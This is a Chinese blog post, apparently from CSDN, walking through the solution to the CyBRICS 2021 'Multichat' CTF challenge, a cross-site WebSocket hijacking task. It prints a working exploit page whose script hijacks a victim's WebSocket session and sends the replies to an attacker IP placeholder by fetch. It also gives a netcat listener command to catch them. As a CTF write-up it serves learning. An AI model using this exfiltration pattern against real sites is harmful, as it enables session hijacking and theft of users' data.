2021 CyBRICS Multichat题解

最新推荐文章于 2024-01-18 08:59:14 发布
最新推荐文章于 2024-01-18 08:59:14 发布
阅读量385 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43085611/article/details/119718213
版权

0 前言

这是一个 CSRF 的题目,以前没怎么做过这类题目,还是挺有趣的。HackTrick 中介绍对于这种Cross-site WebSocket hijacking 的介绍挺详细的。传送门

1 题解

  • 在服务器创建文件 w.html(记得将 IP 替换为自己服务器的 IP)

<meta charset="utf-8">
<script>
    function ws(){
        var ws = new WebSocket("ws://multichat-cybrics2021.ctf.su/ws");
        // 连接成功后的回调函数。
        ws.onopen = function(event){
            // 发送数据
            ws.send("Hey, i forgot the flag. Can you remind me?")
        }
        // 实例对象的onmessage属性,用于指定收到服务器数据后的回调函数
        ws.onmessage = function(event){
            fetch('http://xxx.xxx.xxx.xxx:9999?' + event.data, {mode: 'no-cors'})
        }
    }
    // 调用方法
    ws();
</script>

使用 python3 -m http.server 8080 搭建临时 web 服务,并运行 nc -lvnp 9999 监听请求。

  • 在后台( http://multichat-cybrics2021.ctf.su:5000/ ) 提交 w.html 的 url。即可获得 flag。


2 总结

其实重要的收获不是知识点,而是思想。在比赛前并没有做过这类题目,看完前端的源码之后可以搜索相关的技术和相关的漏洞利用,再结合题目可能的考点是什么。最后再尝试进行解题。

再者就是收集优质的漏洞利用的网站挺重要的,下面是我常用的几个网站

其他小工具类的网站不一一列举了。

chiehw
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021美赛A题解题思路(Fungi)
猫和真人的博客
02-01 9万+
准时赴约。 等待开题中……
2021美赛F题解题思路
qq_53888469的博客
11-08 3329
新队伍,大家都差不多是小白,借鉴的博客:(19条消息) 2021年美赛F题总结_wzu_cza123的博客-CSDN博客_美赛2021f题 文章目录 F题翻译 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、数据的查找与处理 由
Multichat:多人聊天
04-03
多人聊天 Multichat是使用Django框架,Channels和WebSockets在Python中创建的。 聊天消息存储了一段时间(现在是365天),下次登录时可以查看。除了普通聊天,所有访问者都可以看到消息,注册用户可以与其他聊天用户创建私人聊天室。 如果您所在的私人聊天有新消息,它将通过一条特殊消息提醒您。 此外,私人聊天将以红色突出显示。 在私人聊天中,您可以看到谁是该聊天的成员,以及他是处于联机状态还是脱机状态。 您可以退出此私人聊天或添加新成员。 此多聊天适用于Heroku
MultiChat-同时访问百川和通义千问大模型的chrome插件
最新发布
山长的专栏
01-18 854
在浏览器中,同时访问百川和千问大模型,提高效率。
multichat:使用 socket.io 进行多人聊天
06-25
多人聊天 使用 socket.io 进行多人聊天 安装依赖项 npm install 启动 websocket 服务器 浏览到主文件夹并运行以下命令 node server.js
Multi-Chat发布!科研工具大升级!太太太太强了!
E_Magic_Cube的博客
03-21 235
一觉醒来,万众期待的Multi-Chat,它来了!而且专注于高校科研工作者,并且具有四大开发功能AI科研绘图AI数据处理AI学术写作AI 维基百科元素魔方老板王老师直接开门见山地介绍说:这是我们迄今为止功能最强大的科研工具!有多强?根据元素魔方官方的介绍,Multi-Chat是一个超大的多聚合小程序,也就是说,它可以处理任何科研人遇到的场景:AI写作,AI邮件,AI科研绘图,AI科研数据处理,A...
如何利用Multi-Chat搞科研?
E_Magic_Cube的博客
03-21 267
这位研究僧,Multi-Chat都发布了,你还在纯人工搞科研吗?已经有人实测:Multi-Chat科研全流程都能用,尤其是对于英语非母语的科研人员,可以极大地提高日常科研工作效率。连写给导师的请假信,都能编得有模有样。△来自GPT-4完整攻略,已经在知乎收获2000+点赞,赶快一起学起来~(文末还有更多嗑盐小工具推荐)论文搜集助理(原文/芯片斯多葛)重要提醒:Multi-Chat可能会编造不存在的...
2021 ICPC澳门题解(8/11)
Code92007的博客
09-24 5111
2. 0,1,如果正则表达式没匹配完,但是01串已经到结尾了,就会回溯到上一个*,否则,消耗1能量去比较,如果相等则考虑剩下的部分,不等则回溯到上一个*3. ^,如果正则表达式没匹配完,但是01串已经到结尾了,就会回溯到上一个*,否则,消耗1能量,通配当前字符,并比较剩下的部分。nex[i][2]表示第i本书位于位置1/位置k时,下一个操作的书的编号(也即,>i的最小的不在[1,k]的书的编号是多少)次数:n=1时为1,n=2时+2,n=3时+2,n=4时+3,n=5时+3,以此类推。
蓝桥杯2021国赛CB题解
NataliePortman9的博客
06-05 1351
蓝桥杯2021国赛CB题解国赛C++ B组试题 A: 带宽试题 B: 纯质数试题 C: 完全日期试题 D: 最小权值试题 E: 大写试题 F: 123试题 G: 异或变换试题 H: 二进制问题试题 I: 翻转括号序列试题 J: 异或三角 国赛C++ B组 以此文章纪念本人第一次蓝桥杯B组 省一 + 国 ?。 实力有限,题解仅供参考,仅保证部分解的正确性。 以下题解均为临场思路,没有答案,没有AC代码。 试题 A: 带宽 阴间题,不会。 试题 B: 纯质数 20210605 暴力单独判断素数的话复杂度O(
2021年mathorcupD题解题思路-参考资料代码.zip
09-07
2021年的mathorcup竞赛中,D题是一个挑战性的题目,涉及到深度的算法理解和巧妙的解题策略。本资源包包含了参赛者对于D题的解题思路以及参考资料和代码,帮助我们深入理解这个问题及其解决方案。 首先,我们要...
2021年mathorcupD题解题思路参考-代码.zip
10-11
【标题】"2021年mathorcup D题解题思路参考-代码.zip" 提供的是关于2021年mathorcup挑战赛中D题的解题思路及参考代码。mathorcup是一个知名的数学建模竞赛,旨在锻炼参赛者的数学应用能力、逻辑思维以及编程技能。该...
2021天梯赛题解1
08-03
2021天梯赛题解1】是2021年4月30日举办的一场编程竞赛的题目解析,由赵长乐和王小川进行了解析。本文将详细探讨其中涉及的几个编程知识点。 ### L1-3 强迫症 此题目的关键是将一个六位数的年份格式化为"YYYY-MM...
西邮linux小组2021题解
11-07
西邮linux小组2021题解
CyBRICS CTF Quals 2019 Web 题解1
08-04
CyBRICS CTF Quals 2019的Web挑战中,参赛者遇到了一系列涉及前端、后端以及加密解密的问题。以下是针对题目提供的部分解题思路和知识点的详细说明: 1. **Warmup**: - **URL重定向**:这个挑战中,网站最初...
CyBBICS CTF(wp + 复现)
qq_53755216的博客
07-29 5234
Ad Network (Web, Baby, 500 pts) We are so tired of advertising on the internet. It feels like it breaks the internet. Try to follow the ad, try to follow its rules. There is a flag 1337 redirects deep into the network… 我们厌倦了在互联网上做广告。感觉就像它打破了互联网。尝试遵循广告,尝试遵
XCTF-2020CyBRICS部分逆向
re1wn
07-30 6152
XCTF-2020CyBRICS部分逆向
浅谈CTF中escapeshellarg的利用
读万卷书,行万里路。
08-09 5414
浅谈 escapeshellarg 的利用 文章目录浅谈 escapeshellarg 的利用0 前言1 参数注入2 逃逸字符2.1 cat flag2.2 freepoint3 总结 0 前言 escapeshellarg 的作用是把字符串转码为可以在 shell 命令里使用的参数。(escapeshellarg 和 escapeshellcmd 相似,主要看是否有引号) 在 CTF 可能被用于: 参数注入(开发人员错误的使用 escapeshellarg 函数) 逃逸字符(该函数非二进制安全) 1
开源项目-Docker实现AoiAWD一键部署
读万卷书,行万里路。
07-25 2977
1 前言 上次自己手动搭建 AoiAWD,踩了很多坑。于是将自己踩的坑用脚本(Docker)的方式记录下来,为后人铺路吧。 2 食用 Note:guardian.phar、tapeworm.phar、roundworm等文件将会在部署时保存到当前目录下的 tmp 文件夹中。 下载源码 git clone https://github.com/slug01sh/AoiAWD # 这个项目地址不是官方的项目地址 构建镜像 docker-compose build 部署镜像(不建议直接使用 -d
2021美赛b题解题思路
12-04
2021美赛B题的解题思路涉及城市停车问题。题目要求团队设计一个动态减少停车问题的拦截策略,并使用模型分析其效果。 首先,团队需要构建一个数学模型,以了解停车场的情况和车辆流量。这可以通过搜集数据、观察...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值